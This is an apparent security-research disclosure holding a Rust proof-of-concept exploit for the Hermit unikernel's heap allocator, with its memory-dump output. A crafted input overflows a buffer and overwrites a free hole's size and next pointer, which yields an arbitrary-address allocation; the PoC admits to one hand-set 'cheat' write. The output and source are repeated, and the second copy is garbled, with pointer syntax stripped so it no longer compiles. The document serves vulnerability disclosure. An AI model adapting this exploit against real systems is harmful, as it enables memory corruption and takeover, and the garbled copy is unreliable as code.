lrapp-x41-pub/rh-heap-poc-output.txt

## rh-heap-poc-output.txt
--- Welcome aboard our Airbus A 1337! ---

[info] Main @ 0x1906700

 heap layout after allocating all buffers
0x1c04200: 0x101010101010101
0x1c04208: 0x101010101010101
0x1c04210: 0x101010101010101
0x1c04218: 0x101010101010101
0x1c04220: 0x0
0x1c04228: 0x0
0x1c04230: 0x0
0x1c04238: 0x0
0x1c04240: 0x0
0x1c04248: 0x0
0x1c04250: 0x0
0x1c04258: 0x0
0x1c04260: 0x0
0x1c04268: 0x0
0x1c04270: 0x0
0x1c04278: 0x0
0x1c04280: 0x202020202020202
0x1c04288: 0x202020202020202
0x1c04290: 0x202020202020202
0x1c04298: 0x202020202020202
0x1c042a0: 0x202020202020202
0x1c042a8: 0x202020202020202
0x1c042b0: 0x202020202020202
0x1c042b8: 0x202020202020202
0x1c042c0: 0x0
0x1c042c8: 0x0
0x1c042d0: 0x0
0x1c042d8: 0x0
0x1c042e0: 0x0
0x1c042e8: 0x0
0x1c042f0: 0x0
0x1c042f8: 0x0
0x1c04300: 0x303030303030303
0x1c04308: 0x303030303030303
0x1c04310: 0x303030303030303
0x1c04318: 0x303030303030303
0x1c04320: 0x303030303030303
0x1c04328: 0x303030303030303
0x1c04330: 0x303030303030303
0x1c04338: 0x303030303030303
0x1c04340: 0x303030303030303
0x1c04348: 0x303030303030303
0x1c04350: 0x303030303030303
0x1c04358: 0x303030303030303
0x1c04360: 0x303030303030303
0x1c04368: 0x303030303030303
0x1c04370: 0x303030303030303
0x1c04378: 0x303030303030303
0x1c04380: 0x303030303030303
0x1c04388: 0x303030303030303
0x1c04390: 0x303030303030303
0x1c04398: 0x303030303030303
0x1c043a0: 0x303030303030303
0x1c043a8: 0x303030303030303
0x1c043b0: 0x303030303030303
0x1c043b8: 0x303030303030303
0x1c043c0: 0x303030303030303
0x1c043c8: 0x303030303030303
0x1c043d0: 0x303030303030303
0x1c043d8: 0x303030303030303
0x1c043e0: 0x303030303030303
0x1c043e8: 0x303030303030303
0x1c043f0: 0x303030303030303
0x1c043f8: 0x303030303030303
0x1c04400: 0x1bfbc00
0x1c04408: 0x0
0x1c04410: 0x0
0x1c04418: 0x0
0x1c04420: 0x0
0x1c04428: 0x0
0x1c04430: 0x0
0x1c04438: 0x0
0x1c04440: 0x0
0x1c04448: 0x0
0x1c04450: 0x0
0x1c04458: 0x0
0x1c04460: 0x0
0x1c04468: 0x0
0x1c04470: 0x0
0x1c04478: 0x0

 heap layout after deallocating buffer2
0x1c04200: 0x101010101010101
0x1c04208: 0x101010101010101
0x1c04210: 0x101010101010101
0x1c04218: 0x101010101010101
0x1c04220: 0x0
0x1c04228: 0x0
0x1c04230: 0x0
0x1c04238: 0x0
0x1c04240: 0x0
0x1c04248: 0x0
0x1c04250: 0x0
0x1c04258: 0x0
0x1c04260: 0x0
0x1c04268: 0x0
0x1c04270: 0x0
0x1c04278: 0x0
0x1c04280: 0x80
0x1c04288: 0x1c04400
0x1c04290: 0x202020202020202
0x1c04298: 0x202020202020202
0x1c042a0: 0x202020202020202
0x1c042a8: 0x202020202020202
0x1c042b0: 0x202020202020202
0x1c042b8: 0x202020202020202
0x1c042c0: 0x0
0x1c042c8: 0x0
0x1c042d0: 0x0
0x1c042d8: 0x0
0x1c042e0: 0x0
0x1c042e8: 0x0
0x1c042f0: 0x0
0x1c042f8: 0x0
0x1c04300: 0x303030303030303
0x1c04308: 0x303030303030303
0x1c04310: 0x303030303030303
0x1c04318: 0x303030303030303
0x1c04320: 0x303030303030303
0x1c04328: 0x303030303030303
0x1c04330: 0x303030303030303
0x1c04338: 0x303030303030303
0x1c04340: 0x303030303030303
0x1c04348: 0x303030303030303
0x1c04350: 0x303030303030303
0x1c04358: 0x303030303030303
0x1c04360: 0x303030303030303
0x1c04368: 0x303030303030303
0x1c04370: 0x303030303030303
0x1c04378: 0x303030303030303
0x1c04380: 0x303030303030303
0x1c04388: 0x303030303030303
0x1c04390: 0x303030303030303
0x1c04398: 0x303030303030303
0x1c043a0: 0x303030303030303
0x1c043a8: 0x303030303030303
0x1c043b0: 0x303030303030303
0x1c043b8: 0x303030303030303
0x1c043c0: 0x303030303030303
0x1c043c8: 0x303030303030303
0x1c043d0: 0x303030303030303
0x1c043d8: 0x303030303030303
0x1c043e0: 0x303030303030303
0x1c043e8: 0x303030303030303
0x1c043f0: 0x303030303030303
0x1c043f8: 0x303030303030303
0x1c04400: 0x1bfbc00
0x1c04408: 0x0
0x1c04410: 0x0
0x1c04418: 0x0
0x1c04420: 0x0
0x1c04428: 0x0
0x1c04430: 0x0
0x1c04438: 0x0
0x1c04440: 0x0
0x1c04448: 0x0
0x1c04450: 0x0
0x1c04458: 0x0
0x1c04460: 0x0
0x1c04468: 0x0
0x1c04470: 0x0
0x1c04478: 0x0

 heap layout after cheating
0x1c04200: 0x4141414141414141
0x1c04208: 0x4141414141414141
0x1c04210: 0x4141414141414141
0x1c04218: 0x4141414141414141
0x1c04220: 0x4141414141414141
0x1c04228: 0x4141414141414141
0x1c04230: 0x4141414141414141
0x1c04238: 0x4141414141414141
0x1c04240: 0x4141414141414141
0x1c04248: 0x4141414141414141
0x1c04250: 0x4141414141414141
0x1c04258: 0x4141414141414141
0x1c04260: 0x4141414141414141
0x1c04268: 0x4141414141414141
0x1c04270: 0x4141414141414141
0x1c04278: 0x4141414141414141
0x1c04280: 0x40
0x1c04288: 0x1c04380
0x1c04290: 0x202020202020202
0x1c04298: 0x202020202020202
0x1c042a0: 0x202020202020202
0x1c042a8: 0x202020202020202
0x1c042b0: 0x202020202020202
0x1c042b8: 0x202020202020202
0x1c042c0: 0x0
0x1c042c8: 0x0
0x1c042d0: 0x0
0x1c042d8: 0x0
0x1c042e0: 0x0
0x1c042e8: 0x0
0x1c042f0: 0x0
0x1c042f8: 0x0
0x1c04300: 0x303030303030303
0x1c04308: 0x303030303030303
0x1c04310: 0x303030303030303
0x1c04318: 0x303030303030303
0x1c04320: 0x303030303030303
0x1c04328: 0x303030303030303
0x1c04330: 0x303030303030303
0x1c04338: 0x303030303030303
0x1c04340: 0x303030303030303
0x1c04348: 0x303030303030303
0x1c04350: 0x303030303030303
0x1c04358: 0x303030303030303
0x1c04360: 0x303030303030303
0x1c04368: 0x303030303030303
0x1c04370: 0x303030303030303
0x1c04378: 0x303030303030303
0x1c04380: 0x303030303030303
0x1c04388: 0x0
0x1c04390: 0x303030303030303
0x1c04398: 0x303030303030303
0x1c043a0: 0x303030303030303
0x1c043a8: 0x303030303030303
0x1c043b0: 0x303030303030303
0x1c043b8: 0x303030303030303
0x1c043c0: 0x303030303030303
0x1c043c8: 0x303030303030303
0x1c043d0: 0x303030303030303
0x1c043d8: 0x303030303030303
0x1c043e0: 0x303030303030303
0x1c043e8: 0x303030303030303
0x1c043f0: 0x303030303030303
0x1c043f8: 0x303030303030303
0x1c04400: 0x1bfbc00
0x1c04408: 0x0
0x1c04410: 0x0
0x1c04418: 0x0
0x1c04420: 0x0
0x1c04428: 0x0
0x1c04430: 0x0
0x1c04438: 0x0
0x1c04440: 0x0
0x1c04448: 0x0
0x1c04450: 0x0
0x1c04458: 0x0
0x1c04460: 0x0
0x1c04468: 0x0
0x1c04470: 0x0
0x1c04478: 0x0

 heap layout after exploit
0x1c04200: 0x4141414141414141
0x1c04208: 0x4141414141414141
0x1c04210: 0x4141414141414141
0x1c04218: 0x4141414141414141
0x1c04220: 0x4141414141414141
0x1c04228: 0x4141414141414141
0x1c04230: 0x4141414141414141
0x1c04238: 0x4141414141414141
0x1c04240: 0x4141414141414141
0x1c04248: 0x4141414141414141
0x1c04250: 0x4141414141414141
0x1c04258: 0x4141414141414141
0x1c04260: 0x4141414141414141
0x1c04268: 0x4141414141414141
0x1c04270: 0x4141414141414141
0x1c04278: 0x4141414141414141
0x1c04280: 0x40
0x1c04288: 0x1c04500
0x1c04290: 0x202020202020202
0x1c04298: 0x202020202020202
0x1c042a0: 0x202020202020202
0x1c042a8: 0x202020202020202
0x1c042b0: 0x202020202020202
0x1c042b8: 0x202020202020202
0x1c042c0: 0x0
0x1c042c8: 0x0
0x1c042d0: 0x0
0x1c042d8: 0x0
0x1c042e0: 0x0
0x1c042e8: 0x0
0x1c042f0: 0x0
0x1c042f8: 0x0
0x1c04300: 0x303030303030303
0x1c04308: 0x303030303030303
0x1c04310: 0x303030303030303
0x1c04318: 0x303030303030303
0x1c04320: 0x303030303030303
0x1c04328: 0x303030303030303
0x1c04330: 0x303030303030303
0x1c04338: 0x303030303030303
0x1c04340: 0x303030303030303
0x1c04348: 0x303030303030303
0x1c04350: 0x303030303030303
0x1c04358: 0x303030303030303
0x1c04360: 0x303030303030303
0x1c04368: 0x303030303030303
0x1c04370: 0x303030303030303
0x1c04378: 0x303030303030303
0x1c04380: 0x404040404040404
0x1c04388: 0x404040404040404
0x1c04390: 0x404040404040404
0x1c04398: 0x404040404040404
0x1c043a0: 0x404040404040404
0x1c043a8: 0x404040404040404
0x1c043b0: 0x404040404040404
0x1c043b8: 0x404040404040404
0x1c043c0: 0x404040404040404
0x1c043c8: 0x404040404040404
0x1c043d0: 0x404040404040404
0x1c043d8: 0x404040404040404
0x1c043e0: 0x404040404040404
0x1c043e8: 0x404040404040404
0x1c043f0: 0x404040404040404
0x1c043f8: 0x404040404040404
0x1c04400: 0x404040404040404
0x1c04408: 0x404040404040404
0x1c04410: 0x404040404040404
0x1c04418: 0x404040404040404
0x1c04420: 0x404040404040404
0x1c04428: 0x404040404040404
0x1c04430: 0x404040404040404
0x1c04438: 0x404040404040404
0x1c04440: 0x404040404040404
0x1c04448: 0x404040404040404
0x1c04450: 0x404040404040404
0x1c04458: 0x404040404040404
0x1c04460: 0x404040404040404
0x1c04468: 0x404040404040404
0x1c04470: 0x404040404040404
0x1c04478: 0x404040404040404
[info] written to 0x1c04380!

--- Thank you for flying with Expl01t Airlines! ---

## rh-heap-poc.rs
#[cfg(target_os = "hermit")]
extern crate hermit_sys;

fn print_heap_layout(base: usize) {
    let mut i = 0;
    while i < 0x280 {
        unsafe {
            println!("{:p}: 0x{:x}", (base+i) as *const usize, *((base+i) as *const usize));
        }
        i += 8;
    }
}

fn main() {
    println!("\n--- Welcome aboard our Airbus A 1337! ---\n");
    println!("[info] Main @ {:p}", main as *const ());
    // simulated intput
    // fill legitimate buffer + padding to 128byte
    let input: Vec<u8> = Vec::from([
    // fill legitimate 128 byte buffer
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    // overwrite following hole's size
    0x40, 0, 0, 0, 0, 0, 0, 0,
    // overwrite following holes's next pointer with our arbitrary target address
    0x80, 0x43, 0xc0, 0x01, 0, 0, 0, 0
    ]);


    // allocate buffers
    let mut buf: Vec<u8> = vec![1; 32];
    let buf2: Vec<u8> = vec![2; 64];
    let _buf3: Vec<u8> = vec![3; 256];

    println!("\n heap layout after allocating all buffers");
    print_heap_layout(buf.as_ptr() as usize);

    // free buffer2 to have buffer followed by a hole
    drop(buf2);
    println!("\n heap layout after deallocating buffer2");
    print_heap_layout(buf.as_ptr() as usize);


    unsafe {
        // vulnerable copy loop e.g. for a driver copying from shared mmio
        let mut i = 0;
        for elem in input {
            *(buf.as_mut_ptr().offset(i)) = elem;
            i+=1;
        }

        // allocator runs into page fault when fake_hole.next_ptr is not readable or not 0 (end of
        // hole list)
        // also the constraint hole_addr + hole.size <= addr has to be met for the next hole
        // see src/mm/hole.rs#L244
        // Thus, the constraint for this exploit to work is:
        // 1. Target address needs to have a value large enough we get the hole allocated AND
        // 2. Traget address + 8 has to be 0 or a valid readable address matching above condition
        // cheat: set target address + 8 to 0 for this poc
        *(0x1c04388 as *mut u64) = 0;
    }


    println!("\n heap layout after cheating");
    print_heap_layout(buf.as_ptr() as usize);

    // allocate buffer which now is allocated at out arbitrary target address
    // write payload there
    let buf4: Vec<u8> = vec![4; 257];


    println!("\n heap layout after exploit");
    print_heap_layout(buf.as_ptr() as usize);

    println!("[info] written to {:p}!", buf4.as_ptr());
    println!("\n--- Thank you for flying with Expl01t Airlines! ---\n");
}
	--- Welcome aboard our Airbus A 1337! ---

	[info] Main @ 0x1906700

	heap layout after allocating all buffers
	0x1c04200: 0x101010101010101
	0x1c04208: 0x101010101010101
	0x1c04210: 0x101010101010101
	0x1c04218: 0x101010101010101
	0x1c04220: 0x0
	0x1c04228: 0x0
	0x1c04230: 0x0
	0x1c04238: 0x0
	0x1c04240: 0x0
	0x1c04248: 0x0
	0x1c04250: 0x0
	0x1c04258: 0x0
	0x1c04260: 0x0
	0x1c04268: 0x0
	0x1c04270: 0x0
	0x1c04278: 0x0
	0x1c04280: 0x202020202020202
	0x1c04288: 0x202020202020202
	0x1c04290: 0x202020202020202
	0x1c04298: 0x202020202020202
	0x1c042a0: 0x202020202020202
	0x1c042a8: 0x202020202020202
	0x1c042b0: 0x202020202020202
	0x1c042b8: 0x202020202020202
	0x1c042c0: 0x0
	0x1c042c8: 0x0
	0x1c042d0: 0x0
	0x1c042d8: 0x0
	0x1c042e0: 0x0
	0x1c042e8: 0x0
	0x1c042f0: 0x0
	0x1c042f8: 0x0
	0x1c04300: 0x303030303030303
	0x1c04308: 0x303030303030303
	0x1c04310: 0x303030303030303
	0x1c04318: 0x303030303030303
	0x1c04320: 0x303030303030303
	0x1c04328: 0x303030303030303
	0x1c04330: 0x303030303030303
	0x1c04338: 0x303030303030303
	0x1c04340: 0x303030303030303
	0x1c04348: 0x303030303030303
	0x1c04350: 0x303030303030303
	0x1c04358: 0x303030303030303
	0x1c04360: 0x303030303030303
	0x1c04368: 0x303030303030303
	0x1c04370: 0x303030303030303
	0x1c04378: 0x303030303030303
	0x1c04380: 0x303030303030303
	0x1c04388: 0x303030303030303
	0x1c04390: 0x303030303030303
	0x1c04398: 0x303030303030303
	0x1c043a0: 0x303030303030303
	0x1c043a8: 0x303030303030303
	0x1c043b0: 0x303030303030303
	0x1c043b8: 0x303030303030303
	0x1c043c0: 0x303030303030303
	0x1c043c8: 0x303030303030303
	0x1c043d0: 0x303030303030303
	0x1c043d8: 0x303030303030303
	0x1c043e0: 0x303030303030303
	0x1c043e8: 0x303030303030303
	0x1c043f0: 0x303030303030303
	0x1c043f8: 0x303030303030303
	0x1c04400: 0x1bfbc00
	0x1c04408: 0x0
	0x1c04410: 0x0
	0x1c04418: 0x0
	0x1c04420: 0x0
	0x1c04428: 0x0
	0x1c04430: 0x0
	0x1c04438: 0x0
	0x1c04440: 0x0
	0x1c04448: 0x0
	0x1c04450: 0x0
	0x1c04458: 0x0
	0x1c04460: 0x0
	0x1c04468: 0x0
	0x1c04470: 0x0
	0x1c04478: 0x0

	heap layout after deallocating buffer2
	0x1c04200: 0x101010101010101
	0x1c04208: 0x101010101010101
	0x1c04210: 0x101010101010101
	0x1c04218: 0x101010101010101
	0x1c04220: 0x0
	0x1c04228: 0x0
	0x1c04230: 0x0
	0x1c04238: 0x0
	0x1c04240: 0x0
	0x1c04248: 0x0
	0x1c04250: 0x0
	0x1c04258: 0x0
	0x1c04260: 0x0
	0x1c04268: 0x0
	0x1c04270: 0x0
	0x1c04278: 0x0
	0x1c04280: 0x80
	0x1c04288: 0x1c04400
	0x1c04290: 0x202020202020202
	0x1c04298: 0x202020202020202
	0x1c042a0: 0x202020202020202
	0x1c042a8: 0x202020202020202
	0x1c042b0: 0x202020202020202
	0x1c042b8: 0x202020202020202
	0x1c042c0: 0x0
	0x1c042c8: 0x0
	0x1c042d0: 0x0
	0x1c042d8: 0x0
	0x1c042e0: 0x0
	0x1c042e8: 0x0
	0x1c042f0: 0x0
	0x1c042f8: 0x0
	0x1c04300: 0x303030303030303
	0x1c04308: 0x303030303030303
	0x1c04310: 0x303030303030303
	0x1c04318: 0x303030303030303
	0x1c04320: 0x303030303030303
	0x1c04328: 0x303030303030303
	0x1c04330: 0x303030303030303
	0x1c04338: 0x303030303030303
	0x1c04340: 0x303030303030303
	0x1c04348: 0x303030303030303
	0x1c04350: 0x303030303030303
	0x1c04358: 0x303030303030303
	0x1c04360: 0x303030303030303
	0x1c04368: 0x303030303030303
	0x1c04370: 0x303030303030303
	0x1c04378: 0x303030303030303
	0x1c04380: 0x303030303030303
	0x1c04388: 0x303030303030303
	0x1c04390: 0x303030303030303
	0x1c04398: 0x303030303030303
	0x1c043a0: 0x303030303030303
	0x1c043a8: 0x303030303030303
	0x1c043b0: 0x303030303030303
	0x1c043b8: 0x303030303030303
	0x1c043c0: 0x303030303030303
	0x1c043c8: 0x303030303030303
	0x1c043d0: 0x303030303030303
	0x1c043d8: 0x303030303030303
	0x1c043e0: 0x303030303030303
	0x1c043e8: 0x303030303030303
	0x1c043f0: 0x303030303030303
	0x1c043f8: 0x303030303030303
	0x1c04400: 0x1bfbc00
	0x1c04408: 0x0
	0x1c04410: 0x0
	0x1c04418: 0x0
	0x1c04420: 0x0
	0x1c04428: 0x0
	0x1c04430: 0x0
	0x1c04438: 0x0
	0x1c04440: 0x0
	0x1c04448: 0x0
	0x1c04450: 0x0
	0x1c04458: 0x0
	0x1c04460: 0x0
	0x1c04468: 0x0
	0x1c04470: 0x0
	0x1c04478: 0x0

	heap layout after cheating
	0x1c04200: 0x4141414141414141
	0x1c04208: 0x4141414141414141
	0x1c04210: 0x4141414141414141
	0x1c04218: 0x4141414141414141
	0x1c04220: 0x4141414141414141
	0x1c04228: 0x4141414141414141
	0x1c04230: 0x4141414141414141
	0x1c04238: 0x4141414141414141
	0x1c04240: 0x4141414141414141
	0x1c04248: 0x4141414141414141
	0x1c04250: 0x4141414141414141
	0x1c04258: 0x4141414141414141
	0x1c04260: 0x4141414141414141
	0x1c04268: 0x4141414141414141
	0x1c04270: 0x4141414141414141
	0x1c04278: 0x4141414141414141
	0x1c04280: 0x40
	0x1c04288: 0x1c04380
	0x1c04290: 0x202020202020202
	0x1c04298: 0x202020202020202
	0x1c042a0: 0x202020202020202
	0x1c042a8: 0x202020202020202
	0x1c042b0: 0x202020202020202
	0x1c042b8: 0x202020202020202
	0x1c042c0: 0x0
	0x1c042c8: 0x0
	0x1c042d0: 0x0
	0x1c042d8: 0x0
	0x1c042e0: 0x0
	0x1c042e8: 0x0
	0x1c042f0: 0x0
	0x1c042f8: 0x0
	0x1c04300: 0x303030303030303
	0x1c04308: 0x303030303030303
	0x1c04310: 0x303030303030303
	0x1c04318: 0x303030303030303
	0x1c04320: 0x303030303030303
	0x1c04328: 0x303030303030303
	0x1c04330: 0x303030303030303
	0x1c04338: 0x303030303030303
	0x1c04340: 0x303030303030303
	0x1c04348: 0x303030303030303
	0x1c04350: 0x303030303030303
	0x1c04358: 0x303030303030303
	0x1c04360: 0x303030303030303
	0x1c04368: 0x303030303030303
	0x1c04370: 0x303030303030303
	0x1c04378: 0x303030303030303
	0x1c04380: 0x303030303030303
	0x1c04388: 0x0
	0x1c04390: 0x303030303030303
	0x1c04398: 0x303030303030303
	0x1c043a0: 0x303030303030303
	0x1c043a8: 0x303030303030303
	0x1c043b0: 0x303030303030303
	0x1c043b8: 0x303030303030303
	0x1c043c0: 0x303030303030303
	0x1c043c8: 0x303030303030303
	0x1c043d0: 0x303030303030303
	0x1c043d8: 0x303030303030303
	0x1c043e0: 0x303030303030303
	0x1c043e8: 0x303030303030303
	0x1c043f0: 0x303030303030303
	0x1c043f8: 0x303030303030303
	0x1c04400: 0x1bfbc00
	0x1c04408: 0x0
	0x1c04410: 0x0
	0x1c04418: 0x0
	0x1c04420: 0x0
	0x1c04428: 0x0
	0x1c04430: 0x0
	0x1c04438: 0x0
	0x1c04440: 0x0
	0x1c04448: 0x0
	0x1c04450: 0x0
	0x1c04458: 0x0
	0x1c04460: 0x0
	0x1c04468: 0x0
	0x1c04470: 0x0
	0x1c04478: 0x0

	heap layout after exploit
	0x1c04200: 0x4141414141414141
	0x1c04208: 0x4141414141414141
	0x1c04210: 0x4141414141414141
	0x1c04218: 0x4141414141414141
	0x1c04220: 0x4141414141414141
	0x1c04228: 0x4141414141414141
	0x1c04230: 0x4141414141414141
	0x1c04238: 0x4141414141414141
	0x1c04240: 0x4141414141414141
	0x1c04248: 0x4141414141414141
	0x1c04250: 0x4141414141414141
	0x1c04258: 0x4141414141414141
	0x1c04260: 0x4141414141414141
	0x1c04268: 0x4141414141414141
	0x1c04270: 0x4141414141414141
	0x1c04278: 0x4141414141414141
	0x1c04280: 0x40
	0x1c04288: 0x1c04500
	0x1c04290: 0x202020202020202
	0x1c04298: 0x202020202020202
	0x1c042a0: 0x202020202020202
	0x1c042a8: 0x202020202020202
	0x1c042b0: 0x202020202020202
	0x1c042b8: 0x202020202020202
	0x1c042c0: 0x0
	0x1c042c8: 0x0
	0x1c042d0: 0x0
	0x1c042d8: 0x0
	0x1c042e0: 0x0
	0x1c042e8: 0x0
	0x1c042f0: 0x0
	0x1c042f8: 0x0
	0x1c04300: 0x303030303030303
	0x1c04308: 0x303030303030303
	0x1c04310: 0x303030303030303
	0x1c04318: 0x303030303030303
	0x1c04320: 0x303030303030303
	0x1c04328: 0x303030303030303
	0x1c04330: 0x303030303030303
	0x1c04338: 0x303030303030303
	0x1c04340: 0x303030303030303
	0x1c04348: 0x303030303030303
	0x1c04350: 0x303030303030303
	0x1c04358: 0x303030303030303
	0x1c04360: 0x303030303030303
	0x1c04368: 0x303030303030303
	0x1c04370: 0x303030303030303
	0x1c04378: 0x303030303030303
	0x1c04380: 0x404040404040404
	0x1c04388: 0x404040404040404
	0x1c04390: 0x404040404040404
	0x1c04398: 0x404040404040404
	0x1c043a0: 0x404040404040404
	0x1c043a8: 0x404040404040404
	0x1c043b0: 0x404040404040404
	0x1c043b8: 0x404040404040404
	0x1c043c0: 0x404040404040404
	0x1c043c8: 0x404040404040404
	0x1c043d0: 0x404040404040404
	0x1c043d8: 0x404040404040404
	0x1c043e0: 0x404040404040404
	0x1c043e8: 0x404040404040404
	0x1c043f0: 0x404040404040404
	0x1c043f8: 0x404040404040404
	0x1c04400: 0x404040404040404
	0x1c04408: 0x404040404040404
	0x1c04410: 0x404040404040404
	0x1c04418: 0x404040404040404
	0x1c04420: 0x404040404040404
	0x1c04428: 0x404040404040404
	0x1c04430: 0x404040404040404
	0x1c04438: 0x404040404040404
	0x1c04440: 0x404040404040404
	0x1c04448: 0x404040404040404
	0x1c04450: 0x404040404040404
	0x1c04458: 0x404040404040404
	0x1c04460: 0x404040404040404
	0x1c04468: 0x404040404040404
	0x1c04470: 0x404040404040404
	0x1c04478: 0x404040404040404
	[info] written to 0x1c04380!

	--- Thank you for flying with Expl01t Airlines! ---
	#[cfg(target_os = "hermit")]
	extern crate hermit_sys;

	fn print_heap_layout(base: usize) {
	let mut i = 0;
	while i < 0x280 {
	unsafe {
	println!("{:p}: 0x{:x}", (base+i) as const usize, ((base+i) as *const usize));
	}
	i += 8;
	}
	}

	fn main() {
	println!("\n--- Welcome aboard our Airbus A 1337! ---\n");
	println!("[info] Main @ {:p}", main as *const ());
	// simulated intput
	// fill legitimate buffer + padding to 128byte
	let input: Vec<u8> = Vec::from([
	// fill legitimate 128 byte buffer
	0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
	// overwrite following hole's size
	0x40, 0, 0, 0, 0, 0, 0, 0,
	// overwrite following holes's next pointer with our arbitrary target address
	0x80, 0x43, 0xc0, 0x01, 0, 0, 0, 0
	]);


	// allocate buffers
	let mut buf: Vec<u8> = vec![1; 32];
	let buf2: Vec<u8> = vec![2; 64];
	let _buf3: Vec<u8> = vec![3; 256];

	println!("\n heap layout after allocating all buffers");
	print_heap_layout(buf.as_ptr() as usize);

	// free buffer2 to have buffer followed by a hole
	drop(buf2);
	println!("\n heap layout after deallocating buffer2");
	print_heap_layout(buf.as_ptr() as usize);


	unsafe {
	// vulnerable copy loop e.g. for a driver copying from shared mmio
	let mut i = 0;
	for elem in input {
	*(buf.as_mut_ptr().offset(i)) = elem;
	i+=1;
	}

	// allocator runs into page fault when fake_hole.next_ptr is not readable or not 0 (end of
	// hole list)
	// also the constraint hole_addr + hole.size <= addr has to be met for the next hole
	// see src/mm/hole.rs#L244
	// Thus, the constraint for this exploit to work is:
	// 1. Target address needs to have a value large enough we get the hole allocated AND
	// 2. Traget address + 8 has to be 0 or a valid readable address matching above condition
	// cheat: set target address + 8 to 0 for this poc
	(0x1c04388 as mut u64) = 0;
	}


	println!("\n heap layout after cheating");
	print_heap_layout(buf.as_ptr() as usize);

	// allocate buffer which now is allocated at out arbitrary target address
	// write payload there
	let buf4: Vec<u8> = vec![4; 257];


	println!("\n heap layout after exploit");
	print_heap_layout(buf.as_ptr() as usize);

	println!("[info] written to {:p}!", buf4.as_ptr());
	println!("\n--- Thank you for flying with Expl01t Airlines! ---\n");
	}